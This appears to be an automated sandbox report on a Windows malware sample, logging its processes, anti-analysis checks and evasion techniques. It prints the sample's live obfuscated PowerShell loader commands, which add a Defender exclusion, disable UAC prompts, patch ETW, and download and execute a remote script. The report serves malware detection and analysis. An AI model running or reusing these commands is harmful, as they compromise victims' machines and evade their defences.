                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: 22.2.powershell.exe.a16893c.11.raw.unpack, tjjjj.cs .Net Code: Main contains sample name check
                  Source: 22.2.powershell.exe.a6c382c.7.raw.unpack, tjjjj.cs .Net Code: Main contains sample name check
                  Source: 22.2.powershell.exe.96e0000.3.raw.unpack, tjjjj.cs .Net Code: Main contains sample name check
                  Source: 22.2.powershell.exe.a15e2d4.12.raw.unpack, tjjjj.cs .Net Code: Main contains sample name check
                  Source: 22.2.powershell.exe.a6a0b58.8.raw.unpack, tjjjj.cs .Net Code: Main contains sample name check
                  Source: 22.2.powershell.exe.a26258c.6.raw.unpack, tjjjj.cs .Net Code: Main contains sample name check
                  Source: 30.2.powershell.exe.a419e48.5.raw.unpack, tjjjj.cs .Net Code: Main contains sample name check
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4150
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5722
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7510
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2211
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: foregroundWindowGot 693
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: foregroundWindowGot 723
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7787
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1986
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7930
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1623
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6715
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3011
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8079
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1496
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9299
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5904
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9418
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5827
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ilcg05nv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4688 Thread sleep count: 4150 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4284 Thread sleep count: 5722 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3208 Thread sleep time: -13835058055282155s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4508 Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7676 Thread sleep count: 7787 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7680 Thread sleep count: 1986 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7704 Thread sleep time: -5534023222112862s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8048 Thread sleep count: 7930 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8048 Thread sleep count: 1623 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8076 Thread sleep time: -11990383647911201s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7260 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7580 Thread sleep count: 6715 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7544 Thread sleep count: 3011 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7532 Thread sleep time: -4611686018427385s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7904 Thread sleep count: 8079 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7968 Thread sleep count: 1496 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4724 Thread sleep time: -14757395258967632s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7336 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7412 Thread sleep count: 9299 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7448 Thread sleep time: -13835058055282155s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3056 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2136 Thread sleep count: 259 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7508 Thread sleep count: 5904 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1560 Thread sleep time: -8301034833169293s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1628 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3448 Thread sleep count: 196 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7708 Thread sleep count: 9418 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6540 Thread sleep time: -8301034833169293s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1580 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1052 Thread sleep count: 5827 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8188 Thread sleep time: -7378697629483816s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2636 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
                  Source: wscript.exe, 00000000.00000002.2138264909.000001A8A66B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\z
                  Source: wscript.exe, 00000000.00000002.2138264909.000001A8A66B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: powershell.exe, 00000004.00000002.2289800081.0000012971385000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW\4
                  Source: powershell.exe, 0000002B.00000002.2936384962.000000000843F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|G
                  Source: powershell.exe, 0000001E.00000002.2809296079.000000000814A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ZGFlUidbLTEtuvk=VWlhOMExWQmhkR2dnSkhKtwnj=xjeTRpQ2lBZ0lDQjlDbjBtwxu=mViZWl0bXlzbHNnamhqemucwz=pKQl7CQkkZG5xZWw9JHlkudtd=npkamlsemxiLkRpc3Bvc2uidy=bWFpbm1teG56YXh6aHJvauksh=YmpqbmR4dXB2bmppc3F5aulfn=pQWtjR0YwYUNJS0lDQWdJunjd=ycuUmVwbGFjZSgnQUJDJyupkq=3Zmx1djE0TFVqSG9zU0druqlf=dE1UVHBjVTA5R1ZGZEJVaurch=52bmh0dG9jd3NuenhlY25urxt=\poUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userusof=Powuswd=cXpqZ291bHd2ZGEuRGlzcutxq=iYnhyeXV2dHpzb2VjdmZxuuaw=wYXJhbV92YXIsJHBhcmFtuvhb=yk7SUVYICckcHpvY2V4eWuwlb=KbFoxQmhkR2dnUFNBaVNFuwmz=HdsaHhwcHJuICRwem9jZXuwnv=VGV4dC5FbmNvZGluZ106Ouxex="C:\uyxg=ykoJ2FXVjRJQ2hKYm5admuzty=Ml92YXIpewkJSUVYICckbuzyd=KCRtbHF4Z2JieHJ5dXZ0evbjq=RwYXJhbV92YXIpewlJRVgvecd=s\Svenu=Lkxlbmd0aCk7CSRkZWNyevftw=N1bmViZWl0bXlzbHNnamhvfui=dGVtLkNvbnZlcnRdOjooJvipj=kNvbkFCQy5Db0FCQ21wQUvlpe=CsgJ0FCQ1xBQkNkQUJDd0vozg=DNEFCQ1NBQkN0ckFCQ2lBvrrg=BnUjJWMExVMXdVSEpsWm1vumn=aXl6dDskdWR5eHI9W1N5cvyry=exewavh=WeVpXNWpaU0I4SUZObGJHwbzx=WdJQ0JPWlhjdFNYUmxiU0wccr=xcD1pYnB4Z21oanR3a2Jnwindir=C:\Windowswjzdo=swkoy=a2h2ZW90eXZhc2xiPU5ldwlmx=IC1TZWNvbmRzIDU7ZnVuYwpss=F0VUdGMGFDQWtjbVZuVUdwrvj=2ZXNhQm1vckYnWy0xLi4twzpx=1.0wzrp=ppc3F5anpkamlsemxiKTsxgbo=h6aHJvaHdsaHhwcHJuKCRxgqz=bW14bnpheHpocm9od2xoexlwe=([Convert]::FromBase6Xoal=1 xowp=KCdBQkMnLCAnJyk7JGhvcxtop=3RlbS5JTy5GaWxlXTo6KCxvcu=xudHJ4Yndta3pmbHFwa3Nxxpa=weryawo=ZW0uU2VjdXJpdHkuQ3J5cyetv=l\vyfpq=2piZnpvd2J1LkFCQ0VBQkygue=uLi0xMV0gLWpvaW4gJycpyhah=93VGl0bGUgPSAkbWxxeGdyikg=E2XSAtam9pbiAnJykoJ0lyjga=GMGFDQXRSbTl5WTJVS2ZRynqa=FhbHZpd3Jmb2JyeHl2PSRyntz=4String('SUVYKFtUZXh0yomp=IzUmpiMjUwWVdsdWN5QWtyqwqm=tysou=b3FpdGxhaWJtY2tlY3F0eytjh=zZFhQRHRXVnpDaUFnSUNByyhb=EdWdElnb2tjbVZuVG1GdFyznr=mJtRWd
                  Source: powershell.exe, 0000002B.00000002.2823019650.0000000000C94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pHMXBiaUlLSkhKbqduj=CQygkbnVsbCwgJHBhcmFtqfek=NhQUJDc0FCQ2VBQkM2QUJqghb=BQkN0QUJDJy5SZXBsYWNlqhim=2dHNwc3VuZWJlaXRteXNsqjzl=FoxWmhiSFZsSUQwZ01Bb0qkbh=LQ2dwQlpHUXRWMmx1Wkc5qmne=JGRucWVsLlNwbGl0KCdcJqrcx=QUtFUElBZDhJSEtxVHFzcqskq=bSgsJHBhcmFtX3Zhcik7Jqvaa=oke-Expression"qwjl=LlNlY3VyaXR5LkNyeXB0bqziz=tVnVkRlpsY25OcGIyNWNVrhmj=kNyZUFCQ3NzKTsnLlJlcGrjzk=ldkV1lXeDFaUW9LVjNKcGrkeo=Zhci5DcmVhdGVEZWNyeXBrlle=FCQ2VBQkNtQUJDb0FCQ3Jrlvj=ycuUmVwbGFjZSgnQUJDJyrouy=Ba2NHRjBhQW9nSUNBZ0lDrtfh=R1emN4aGtncmtrcnlyaGsrwav=helsaod=UoKTsJJGFlc192YXIuRGlsbco=aWJlcmJlaXV4YW9mcmdvIscbh=2dyYXBoeS5DaXBoZXJNb2scmr=dWx3dmRhPU5ldy1PYmplYsefj=3Rpb24geWxjZnhmZXRkd2SESSIONNAME=Consolesmch=dGVtLlNlY3VyaXR5LkNyesobo=dNb2RlXTo6UEtDUzc7CSRsofe=Fnc1sxXSkpKTsnLlJlcGxsorn=VSEp2YlhCMFFtVm9ZWFpwsourceFile=C:\Users\user\AppData\Roaming\WindowsUpdate_394.batsptn=uamlzcXlqemRqaWx6bGIusqkw=nFocnd4YXJyd3VvbXp0dWsrid=AnJyk7CUlFWCAnJHFiampsupy=JJGdubmJyYWR5dXp6YWljsvpj=pDcmVhdGUoKTsJJGFlc19swld=hY2UoJ0FCQycsICcnKTtxSystemDrive=C:SystemRoot=C:\Windowsszhf=0JobTZKNmZQaEJwSnBSY3tbfd=mJ4cnl1dnR6c29lY3ZmcWtctb=owsteci=QUJDZUFCQ2FBQkNtQUJDOTEMP=C:\Users\user\AppData\Local\Temptghr=SUNBZ0lDTWdRV1JwWTJsdtimle=settmfd=4\WTMP=C:\Users\user\AppData\Local\Temptmtn=G9zZSgpOwkkYndqdnBhantqlo=Hl4cikgewlpZiAoJHlkYStqyn=d0eGVUbGxBZGFlUidbLTEtuvk=VWlhOMExWQmhkR2dnSkhKtwnj=xjeTRpQ2lBZ0lDQjlDbjBtwxu=mViZWl0bXlzbHNnamhqemucwz=pKQl7CQkkZG5xZWw9JHlkudtd=npkamlsemxiLkRpc3Bvc2uidy=bWFpbm1teG56YXh6aHJvauksh=YmpqbmR4dXB2bmppc3F5aulfn=pQWtjR0YwYUNJS0lDQWdJunjd=ycuUmVwbGFjZSgnQUJDJyupkq=3Zmx1djE0TFVqSG9zU0druqlf=dE1UVHBjVTA5R1ZGZEJVaurch=52bmh0dG9jd3NuenhlY25urxt=\poUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userusof=Powuswd=cXpqZ291bHd2ZGEuRGlzcutxq=iYnhyeXV2dHpzb2VjdmZxuuaw=wYXJhbV92YXIsJHBhcmFtuvhb=yk7SUVYICckcHpvY2V4eWuwlb=KbFoxQmhkR2dnUFNBaVNFuwm
z=HdsaHhwcHJuICRwem9jZXuwnv=VGV4dC5FbmNvZGluZ106Ouxex="C:\uyxg=ykoJ2FXVjRJQ2hKYm5admuzty=Ml92YXIpewkJSUVYICckbuzyd=KCRtbHF4Z2JieHJ5dXZ0evbjq=RwYXJhbV92YXIpewlJRVgvecd=s\Svenu=Lkxlbmd0aCk7CSRkZWNyevftw=N1bmViZWl0bXlzbHNnamhvfui=dGVtLkNvbnZlcnRdOjooJvipj=kNvbkFCQy5Db0FCQ21wQUvlpe=CsgJ0FCQ1xBQkNkQUJDd0vozg=DNEFCQ1NBQkN0ckFCQ2lBvrrg=BnUjJWMExVMXdVSEpsWm1vumn=aXl6dDskdWR5eHI9W1N5cvyry=exewavh=WeVpXNWpaU0I4SUZObGJHwbzx=WdJQ0JPWlhjdFNYUmxiU0wccr=xcD1pYnB4Z21oanR3a2Jnwindir=C:\Windowswjzdo=swkoy=a2h2ZW90eXZhc2xiPU5ldwlmx=IC1TZWNvbmRzIDU7ZnVuYwpss=F0VUdGMGFDQWtjbVZuVUdwrvj=2ZXNhQm1vckYnWy0xLi4twzpx=1.0wzrp=ppc3F5anpkamlsemxiKTsxgbo=h6aHJvaHdsaHhwcHJuKCRxgqz=bW14bnpheHpocm9od2xoexlwe=([Convert]::FromBase6Xoal=1 xowp=KCdBQkMnLCAnJyk7JGhvcxtop=3RlbS5JTy5GaWxlXTo6KCxvcu=xudHJ4Yndta3pmbHFwa3Nxxpa=weryawo=ZW0uU2VjdXJpdHkuQ3J5cyetv=l\vyfpq=2piZnpvd2J1LkFCQ0VBQkygue=uLi0xMV0gLWpvaW4gJycpyhah=93VGl0bGUgPSAkbWxxeGdyikg=E2XSAtam9pbiAnJykoJ0lyjga=GMGFDQXRSbTl5WTJVS2ZRynqa=FhbHZpd3Jmb2JyeHl2PSRyntz=4String('SUVYKFtUZXh0yomp=IzUmpiMjUwWVdsdWN5QWtyqwqm=tysou=b3FpdGxhaWJtY2tlY3F0eytjh=zZFhQRHRXVnpDaUFnSUNByyhb=EdWdElnb2tjbVZuVG1GdFyznr=mJtRWdieUJ
                  Source: powershell.exe, 00000004.00000002.2289800081.0000012971335000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2289800081.0000012971385000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                  Source: powershell.exe, 00000016.00000002.2806054422.000000000804C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2809296079.000000000814A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: powershell.exe, 0000000D.00000002.3635023745.0000000006B36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3635023745.000000000639D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3635023745.0000000006976000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3635023745.0000000006636000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3635023745.00000000067B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3635023745.00000000064ED000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: kKP/aB55fYI8X0hGfs50TvgZAINv7maZKLIQBUWG02dI0BIxLDjCklFJQhGLBZIwQtr1
                  Source: powershell.exe, 0000000D.00000002.3719703937.00000000083F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllPp
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort

                  HIPS / PFW / Operating System Protection Evasion

                  Source: 22.2.powershell.exe.a16893c.11.raw.unpack, tjjjj.cs Reference to suspicious API methods: LoadLibrary("ntdll.dll")
                  Source: 22.2.powershell.exe.a16893c.11.raw.unpack, tjjjj.cs Reference to suspicious API methods: GetProcAddress(hModule, "EtwEventWrite")
                  Source: 22.2.powershell.exe.a16893c.11.raw.unpack, tjjjj.cs Reference to suspicious API methods: VirtualProtect(procAddress, (UIntPtr)(ulong)array.Length, PAGE_EXECUTE_READWRITE, out var lpflOldProtect)
                  Source: 22.2.powershell.exe.96f0000.4.raw.unpack, UltraSpeed.cs Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE
2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'…'+[cHAr]0X22+'))')))"
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'…'+[cHAr]0X22+'))')))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\DeviceCredentialDeployment.exe "C:\Windows\system32\DeviceCredentialDeployment.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilcg05nv.cmdline"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\windowsupdate.vbS"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES509F.tmp" "c:\Users\user\AppData\Local\Temp\CSC8F7BB283C99B46799FCDCA9D84A75A0.TMP"
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c.bat" "
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\c.bat"
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('…
